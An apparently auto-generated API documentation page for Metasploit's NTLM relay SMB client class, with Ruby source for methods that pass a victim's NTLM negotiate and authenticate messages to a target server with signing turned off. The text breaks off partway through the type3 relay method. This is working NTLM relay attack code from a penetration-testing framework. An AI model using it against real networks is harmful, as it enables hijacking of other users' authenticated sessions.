adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c3f5bd3de2d1affa01e2f6c2066c6bb0fc6413bc
metasploit-gs/api/Msf/Exploit/Remote/Relay/NTLM/Target/SMB/Client.html
T
jenkins-metasploit c3f5bd3de2 Reboot gh-pages
2026-05-08 17:08:43 +00:00

956 lines
39 KiB
HTML
Raw Blame History

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Class: Msf::Exploit::Remote::Relay::NTLM::Target::SMB::Client
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../../../../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../../../../../../css/common.css" type="text/css" />
<script type="text/javascript">
pathId = "Msf::Exploit::Remote::Relay::NTLM::Target::SMB::Client";
relpath = '../../../../../../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../../../../../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../../../../../../js/app.js"></script>
</head>
<body>
<div class="nav_wrap">
<iframe id="nav" src="../../../../../../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../../../../../_index.html">Index (C)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../../../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../../Relay.html" title="Msf::Exploit::Remote::Relay (module)">Relay</a></span></span> &raquo; <span class='title'>NTLM</span> &raquo; <span class='title'>Target</span> &raquo; <span class='title'><span class='object_link'><a href="../SMB.html" title="Msf::Exploit::Remote::Relay::NTLM::Target::SMB (module)">SMB</a></span></span>
&raquo;
<span class="title">Client</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../../../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Class: Msf::Exploit::Remote::Relay::NTLM::Target::SMB::Client
</h1>
<div class="box_info">
<dl>
<dt>Inherits:</dt>
<dd>
<span class="inheritName">RubySMB::Client</span>
<ul class="fullTree">
<li>Object</li>
<li class="next">RubySMB::Client</li>
<li class="next">Msf::Exploit::Remote::Relay::NTLM::Target::SMB::Client</li>
</ul>
<a href="#" class="inheritanceTree">show all</a>
</dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/remote/relay/ntlm/target/smb/client.rb</dd>
</dl>
</div>
<h2>Overview</h2><div class="docstring">
<div class="discussion">
<p>The SMB Client for interacting with the relayed_target</p>
</div>
</div>
<div class="tags">
</div>
<h2>
Constant Summary
<small><a href="#" class="constants_summary_toggle">collapse</a></small>
</h2>
<dl class="constants">
<dt id="SUPPORTED_CLIENT_DIALECTS-constant" class="">SUPPORTED_CLIENT_DIALECTS =
<div class="docstring">
<div class="discussion">
<p>The supported server dialects. SMB 1 is not supported: <a href="https://github.com/rapid7/metasploit-framework/issues/16261">github.com/rapid7/metasploit-framework/issues/16261</a> Note there are similar supported dialects for both the server and the relay clients SMB::Relay::NTLM::SUPPORTED_SERVER_DIALECTS and <span class='object_link'><a href="#SUPPORTED_CLIENT_DIALECTS-constant" title="Msf::Exploit::Remote::Relay::NTLM::Target::SMB::Client::SUPPORTED_CLIENT_DIALECTS (constant)">SUPPORTED_CLIENT_DIALECTS</a></span></p>
</div>
</div>
<div class="tags">
</div>
</dt>
<dd><pre class="code"><span class='lbracket'>[</span>
<span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>Client</span><span class='op'>::</span><span class='const'>SMB2_DIALECT_0202</span><span class='comma'>,</span>
<span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>Client</span><span class='op'>::</span><span class='const'>SMB2_DIALECT_0210</span><span class='comma'>,</span>
<span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>Client</span><span class='op'>::</span><span class='const'>SMB2_DIALECT_0300</span><span class='comma'>,</span>
<span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>Client</span><span class='op'>::</span><span class='const'>SMB2_DIALECT_0302</span><span class='comma'>,</span>
<span class='rbracket'>]</span></pre></dd>
</dl>
<h2>Instance Attribute Summary <small><a href="#" class="summary_toggle">collapse</a></small></h2>
<ul class="summary">
<li class="protected ">
<span class="summary_signature">
<a href="#logger-instance_method" title="#logger (instance method)">#<strong>logger</strong> &#x21d2; Object </a>
</span>
<span class="note title readonly">readonly</span>
<span class="note title protected">protected</span>
<span class="summary_desc"><div class='inline'>
<p>Returns the value of attribute logger.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#target-instance_method" title="#target (instance method)">#<strong>target</strong> &#x21d2; Object </a>
</span>
<span class="note title readonly">readonly</span>
<span class="summary_desc"><div class='inline'>
<p>Returns the value of attribute target.</p>
</div></span>
</li>
</ul>
<h2>
Class Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#create-class_method" title="create (class method)">.<strong>create</strong>(provider, target, logger, timeout) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
</ul>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#add_smb3_to_negotiate_request-instance_method" title="#add_smb3_to_negotiate_request (instance method)">#<strong>add_smb3_to_negotiate_request</strong>(packet, _dialects = []) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#initialize-instance_method" title="#initialize (instance method)">#<strong>initialize</strong>(dispatcher, username:, password:, domain: nil, local_workstation: nil, always_encrypt: nil, ntlm_flags: nil, provider: nil, target: nil, logger: nil) &#x21d2; Client </a>
</span>
<span class="note title constructor">constructor</span>
<span class="summary_desc"><div class='inline'>
<p>A new instance of Client.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#normalize_type3_encoding-instance_method" title="#normalize_type3_encoding (instance method)">#<strong>normalize_type3_encoding</strong>(type3_msg) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#relay_ntlmssp_type1-instance_method" title="#relay_ntlmssp_type1 (instance method)">#<strong>relay_ntlmssp_type1</strong>(client_type1_msg) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#relay_ntlmssp_type3-instance_method" title="#relay_ntlmssp_type3 (instance method)">#<strong>relay_ntlmssp_type3</strong>(client_type3_msg) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
</ul>
<div id="constructor_details" class="method_details_list">
<h2>Constructor Details</h2>
<div class="method_details first">
<h3 class="signature first" id="initialize-instance_method">
#<strong>initialize</strong>(dispatcher, username:, password:, domain: nil, local_workstation: nil, always_encrypt: nil, ntlm_flags: nil, provider: nil, target: nil, logger: nil) &#x21d2; <tt><span class='object_link'><a href="" title="Msf::Exploit::Remote::Relay::NTLM::Target::SMB::Client (class)">Client</a></span></tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns a new instance of Client.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/relay/ntlm/target/smb/client.rb', line 18</span>
<span class='kw'>def</span> <span class='id identifier rubyid_initialize'>initialize</span><span class='lparen'>(</span><span class='id identifier rubyid_dispatcher'>dispatcher</span><span class='comma'>,</span> <span class='label'>username:</span><span class='comma'>,</span> <span class='label'>password:</span><span class='comma'>,</span> <span class='label'>domain:</span> <span class='kw'>nil</span><span class='comma'>,</span> <span class='label'>local_workstation:</span> <span class='kw'>nil</span><span class='comma'>,</span> <span class='label'>always_encrypt:</span> <span class='kw'>nil</span><span class='comma'>,</span> <span class='label'>ntlm_flags:</span> <span class='kw'>nil</span><span class='comma'>,</span> <span class='label'>provider:</span> <span class='kw'>nil</span><span class='comma'>,</span> <span class='label'>target:</span> <span class='kw'>nil</span><span class='comma'>,</span> <span class='label'>logger:</span> <span class='kw'>nil</span><span class='rparen'>)</span>
<span class='kw'>super</span><span class='lparen'>(</span><span class='id identifier rubyid_dispatcher'>dispatcher</span><span class='comma'>,</span>
<span class='label'>smb1:</span> <span class='kw'>false</span><span class='comma'>,</span>
<span class='label'>smb2:</span> <span class='kw'>true</span><span class='comma'>,</span>
<span class='label'>smb3:</span> <span class='kw'>true</span><span class='comma'>,</span>
<span class='label'>username:</span> <span class='id identifier rubyid_username'>username</span><span class='comma'>,</span>
<span class='label'>password:</span> <span class='id identifier rubyid_password'>password</span><span class='comma'>,</span>
<span class='label'>domain:</span> <span class='id identifier rubyid_domain'>domain</span><span class='comma'>,</span>
<span class='label'>local_workstation:</span> <span class='id identifier rubyid_local_workstation'>local_workstation</span><span class='comma'>,</span>
<span class='label'>always_encrypt:</span> <span class='id identifier rubyid_always_encrypt'>always_encrypt</span><span class='comma'>,</span>
<span class='label'>ntlm_flags:</span> <span class='id identifier rubyid_ntlm_flags'>ntlm_flags</span><span class='rparen'>)</span>
<span class='ivar'>@logger</span> <span class='op'>=</span> <span class='id identifier rubyid_logger'>logger</span>
<span class='ivar'>@provider</span> <span class='op'>=</span> <span class='id identifier rubyid_provider'>provider</span>
<span class='ivar'>@target</span> <span class='op'>=</span> <span class='id identifier rubyid_target'>target</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
<div id="instance_attr_details" class="attr_details">
<h2>Instance Attribute Details</h2>
<span id=""></span>
<div class="method_details first">
<h3 class="signature first" id="logger-instance_method">
#<strong>logger</strong> &#x21d2; <tt>Object</tt> <span class="extras">(readonly, protected)</span>
</h3><div class="docstring">
<div class="discussion">
<p>Returns the value of attribute logger.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
162
163
164</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/relay/ntlm/target/smb/client.rb', line 162</span>
<span class='kw'>def</span> <span class='id identifier rubyid_logger'>logger</span>
<span class='ivar'>@logger</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<span id=""></span>
<div class="method_details ">
<h3 class="signature " id="target-instance_method">
#<strong>target</strong> &#x21d2; <tt>Object</tt> <span class="extras">(readonly)</span>
</h3><div class="docstring">
<div class="discussion">
<p>Returns the value of attribute target.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
16
17
18</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/relay/ntlm/target/smb/client.rb', line 16</span>
<span class='kw'>def</span> <span class='id identifier rubyid_target'>target</span>
<span class='ivar'>@target</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
<div id="class_method_details" class="method_details_list">
<h2>Class Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="create-class_method">
.<strong>create</strong>(provider, target, logger, timeout) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/relay/ntlm/target/smb/client.rb', line 35</span>
<span class='kw'>def</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_create'>create</span><span class='lparen'>(</span><span class='id identifier rubyid_provider'>provider</span><span class='comma'>,</span> <span class='id identifier rubyid_target'>target</span><span class='comma'>,</span> <span class='id identifier rubyid_logger'>logger</span><span class='comma'>,</span> <span class='id identifier rubyid_timeout'>timeout</span><span class='rparen'>)</span>
<span class='id identifier rubyid_sock'>sock</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Socket</span><span class='op'>::</span><span class='const'>Tcp</span><span class='period'>.</span><span class='id identifier rubyid_create'>create</span><span class='lparen'>(</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>PeerHost</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_ip'>ip</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>PeerPort</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_port'>port</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Timeout</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_timeout'>timeout</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Context</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Caller</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_provider'>provider</span>
<span class='rbrace'>}</span>
<span class='rparen'>)</span>
<span class='id identifier rubyid_dispatcher'>dispatcher</span> <span class='op'>=</span> <span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>Dispatcher</span><span class='op'>::</span><span class='const'>Socket</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='id identifier rubyid_sock'>sock</span><span class='rparen'>)</span>
<span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span>
<span class='id identifier rubyid_dispatcher'>dispatcher</span><span class='comma'>,</span>
<span class='label'>provider:</span> <span class='id identifier rubyid_provider'>provider</span><span class='comma'>,</span>
<span class='label'>username:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='label'>password:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='label'>target:</span> <span class='id identifier rubyid_target'>target</span><span class='comma'>,</span>
<span class='label'>always_encrypt:</span> <span class='kw'>false</span><span class='comma'>,</span>
<span class='label'>logger:</span> <span class='id identifier rubyid_logger'>logger</span>
<span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="add_smb3_to_negotiate_request-instance_method">
#<strong>add_smb3_to_negotiate_request</strong>(packet, _dialects = []) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
57
58
59</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/relay/ntlm/target/smb/client.rb', line 57</span>
<span class='kw'>def</span> <span class='id identifier rubyid_add_smb3_to_negotiate_request'>add_smb3_to_negotiate_request</span><span class='lparen'>(</span><span class='id identifier rubyid_packet'>packet</span><span class='comma'>,</span> <span class='id identifier rubyid__dialects'>_dialects</span> <span class='op'>=</span> <span class='lbracket'>[</span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='kw'>super</span><span class='lparen'>(</span><span class='id identifier rubyid_packet'>packet</span><span class='comma'>,</span> <span class='const'><span class='object_link'><a href="#SUPPORTED_CLIENT_DIALECTS-constant" title="Msf::Exploit::Remote::Relay::NTLM::Target::SMB::Client::SUPPORTED_CLIENT_DIALECTS (constant)">SUPPORTED_CLIENT_DIALECTS</a></span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="normalize_type3_encoding-instance_method">
#<strong>normalize_type3_encoding</strong>(type3_msg) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
154
155
156</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/relay/ntlm/target/smb/client.rb', line 154</span>
<span class='kw'>def</span> <span class='id identifier rubyid_normalize_type3_encoding'>normalize_type3_encoding</span><span class='lparen'>(</span><span class='id identifier rubyid_type3_msg'>type3_msg</span><span class='rparen'>)</span>
<span class='id identifier rubyid_type3_msg'>type3_msg</span><span class='period'>.</span><span class='id identifier rubyid_security_buffers'>security_buffers</span><span class='period'>.</span><span class='id identifier rubyid_map!'>map!</span><span class='lbrace'>{</span> <span class='op'>|</span><span class='id identifier rubyid__buffer_name'>_buffer_name</span><span class='comma'>,</span> <span class='id identifier rubyid_security_buffer'>security_buffer</span><span class='op'>|</span> <span class='id identifier rubyid_security_buffer'>security_buffer</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span><span class='period'>.</span><span class='id identifier rubyid_force_encoding'>force_encoding</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>ASCII-8BIT</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span> <span class='rbrace'>}</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="relay_ntlmssp_type1-instance_method">
#<strong>relay_ntlmssp_type1</strong>(client_type1_msg) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>client_type1_msg</span>
<span class='type'>(<tt>String</tt>)</span>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/relay/ntlm/target/smb/client.rb', line 63</span>
<span class='kw'>def</span> <span class='id identifier rubyid_relay_ntlmssp_type1'>relay_ntlmssp_type1</span><span class='lparen'>(</span><span class='id identifier rubyid_client_type1_msg'>client_type1_msg</span><span class='rparen'>)</span>
<span class='ivar'>@version</span> <span class='op'>=</span> <span class='id identifier rubyid_negotiate'>negotiate</span>
<span class='kw'>if</span> <span class='ivar'>@version</span> <span class='op'>==</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SMB1</span><span class='tstring_end'>&#39;</span></span>
<span class='comment'># TODO: SMB1 not supported
</span> <span class='comment'># neg_pkt = smb1_ntlmssp_negotiate_packet
</span> <span class='comment'># neg_pkt.set_ntlm_type1_blob(victim_type1_msg.serialize)
</span> <span class='comment'># resp = send_recv(neg_pkt)
</span> <span class='comment'>#
</span> <span class='comment'># challenge_packet = smb1_ntlmssp_challenge_packet(resp)
</span> <span class='comment'>#
</span> <span class='comment'># # Store the available OS information before going forward.
</span> <span class='comment'># @peer_native_os = challenge_packet.data_block.native_os.to_s
</span> <span class='comment'># @peer_native_lm = challenge_packet.data_block.native_lan_man.to_s
</span> <span class='comment'>#
</span> <span class='comment'># @user_id = challenge_packet.smb_header.uid
</span> <span class='comment'>#
</span> <span class='comment'># type2_message_encoded = smb1_type2_message(challenge_packet)
</span> <span class='comment'>#
</span> <span class='comment'># type2_challenge = Net::NTLM::Message.decode64(type2_message_encoded)
</span> <span class='comment'>#
</span> <span class='comment'># type2_challenge.challenge
</span> <span class='kw'>else</span>
<span class='comment'># Same as the ::RubySMB::Client::Authentication smb2_authenticate method, with two differences
</span> <span class='comment'># - changes the type1_blob to match the blob of the type1 messages received from the client
</span> <span class='comment'># - returns the challenge messages received from the server
</span>
<span class='id identifier rubyid_server_type1_pkt'>server_type1_pkt</span> <span class='op'>=</span> <span class='id identifier rubyid_smb2_ntlmssp_negotiate_packet'>smb2_ntlmssp_negotiate_packet</span>
<span class='id identifier rubyid_server_type1_pkt'>server_type1_pkt</span><span class='period'>.</span><span class='id identifier rubyid_set_security_buffer'>set_security_buffer</span><span class='lparen'>(</span><span class='id identifier rubyid_client_type1_msg'>client_type1_msg</span><span class='rparen'>)</span>
<span class='id identifier rubyid_server_type1_pkt'>server_type1_pkt</span><span class='period'>.</span><span class='id identifier rubyid_security_mode'>security_mode</span><span class='period'>.</span><span class='id identifier rubyid_signing_enabled'>signing_enabled</span> <span class='op'>=</span> <span class='int'>0</span>
<span class='id identifier rubyid_server_type2_pkt_raw'>server_type2_pkt_raw</span> <span class='op'>=</span> <span class='id identifier rubyid_send_recv'>send_recv</span><span class='lparen'>(</span><span class='id identifier rubyid_server_type1_pkt'>server_type1_pkt</span><span class='rparen'>)</span>
<span class='id identifier rubyid_server_type2_pkt'>server_type2_pkt</span> <span class='op'>=</span> <span class='id identifier rubyid_smb2_ntlmssp_challenge_packet'>smb2_ntlmssp_challenge_packet</span><span class='lparen'>(</span><span class='id identifier rubyid_server_type2_pkt_raw'>server_type2_pkt_raw</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='ivar'>@dialect</span> <span class='op'>==</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>0x0311</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_update_preauth_hash'>update_preauth_hash</span><span class='lparen'>(</span><span class='id identifier rubyid_server_type2_pkt'>server_type2_pkt</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='ivar'>@session_id</span> <span class='op'>=</span> <span class='id identifier rubyid_server_type2_pkt'>server_type2_pkt</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_session_id'>session_id</span>
<span class='id identifier rubyid_type2_ntlm_message'>type2_ntlm_message</span> <span class='op'>=</span> <span class='id identifier rubyid_smb2_type2_message'>smb2_type2_message</span><span class='lparen'>(</span><span class='id identifier rubyid_server_type2_pkt'>server_type2_pkt</span><span class='rparen'>)</span>
<span class='const'><span class='object_link'><a href="../../../../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Relay.html" title="Msf::Exploit::Remote::Relay (module)">Relay</a></span></span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Target</span><span class='op'>::</span><span class='const'>RelayResult</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span>
<span class='label'>message:</span> <span class='const'>Net</span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Message</span><span class='period'>.</span><span class='id identifier rubyid_decode64'>decode64</span><span class='lparen'>(</span><span class='id identifier rubyid_type2_ntlm_message'>type2_ntlm_message</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='label'>nt_status:</span> <span class='const'><span class='object_link'><a href="../../../../../../WindowsError.html" title="Msf::WindowsError (class)">WindowsError</a></span></span><span class='op'>::</span><span class='const'>NTStatus</span><span class='op'>::</span><span class='const'>STATUS_MORE_PROCESSING_REQUIRED</span>
<span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>rescue</span> <span class='op'>::</span><span class='const'>Exception</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='id identifier rubyid_msg'>msg</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Unable to retrieve server challenge from </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_target'>target</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_elog'><span class='object_link'><a href="../../../../../../../top-level-namespace.html#elog-instance_method" title="#elog (method)">elog</a></span></span><span class='lparen'>(</span><span class='id identifier rubyid_msg'>msg</span><span class='comma'>,</span> <span class='label'>error:</span> <span class='id identifier rubyid_e'>e</span><span class='rparen'>)</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_error'>print_error</span> <span class='id identifier rubyid_msg'>msg</span>
<span class='kw'>nil</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="relay_ntlmssp_type3-instance_method">
#<strong>relay_ntlmssp_type3</strong>(client_type3_msg) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>client_type3_msg</span>
<span class='type'>(<tt>String</tt>)</span>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/relay/ntlm/target/smb/client.rb', line 117</span>
<span class='kw'>def</span> <span class='id identifier rubyid_relay_ntlmssp_type3'>relay_ntlmssp_type3</span><span class='lparen'>(</span><span class='id identifier rubyid_client_type3_msg'>client_type3_msg</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='ivar'>@version</span> <span class='op'>==</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SMB1</span><span class='tstring_end'>&#39;</span></span>
<span class='comment'># TODO: SMB1 not supported
</span> <span class='kw'>else</span>
<span class='id identifier rubyid_packet'>packet</span> <span class='op'>=</span> <span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>SMB2</span><span class='op'>::</span><span class='const'>Packet</span><span class='op'>::</span><span class='const'>SessionSetupRequest</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span>
<span class='id identifier rubyid_packet'>packet</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_session_id'>session_id</span> <span class='op'>=</span> <span class='ivar'>@session_id</span>
<span class='id identifier rubyid_packet'>packet</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_credits'>credits</span> <span class='op'>=</span> <span class='int'>127</span>
<span class='id identifier rubyid_packet'>packet</span><span class='period'>.</span><span class='id identifier rubyid_security_mode'>security_mode</span><span class='period'>.</span><span class='id identifier rubyid_signing_enabled'>signing_enabled</span> <span class='op'>=</span> <span class='int'>0</span>
<span class='id identifier rubyid_packet'>packet</span><span class='period'>.</span><span class='id identifier rubyid_set_security_buffer'>set_security_buffer</span><span class='lparen'>(</span><span class='id identifier rubyid_client_type3_msg'>client_type3_msg</span><span class='rparen'>)</span>
<span class='comment'># packet.buffer = victim_type3_message
</span>
<span class='id identifier rubyid_response'>response</span> <span class='op'>=</span> <span class='id identifier rubyid_send_recv'>send_recv</span><span class='lparen'>(</span><span class='id identifier rubyid_packet'>packet</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='ivar'>@dialect</span> <span class='op'>==</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>0x0311</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_update_preauth_hash'>update_preauth_hash</span><span class='lparen'>(</span><span class='id identifier rubyid_packet'>packet</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='comment'># raw = smb2_ntlmssp_authenticate(victim_type3_message, @session_id)
</span> <span class='id identifier rubyid_response'>response</span> <span class='op'>=</span> <span class='id identifier rubyid_smb2_ntlmssp_final_packet'>smb2_ntlmssp_final_packet</span><span class='lparen'>(</span><span class='id identifier rubyid_response'>response</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='ivar'>@smb3</span> <span class='op'>&amp;&amp;</span> <span class='op'>!</span><span class='ivar'>@session_encrypt_data</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_session_flags'>session_flags</span><span class='period'>.</span><span class='id identifier rubyid_encrypt_data'>encrypt_data</span> <span class='op'>==</span> <span class='int'>1</span>
<span class='ivar'>@session_encrypt_data</span> <span class='op'>=</span> <span class='kw'>true</span>
<span class='kw'>end</span>
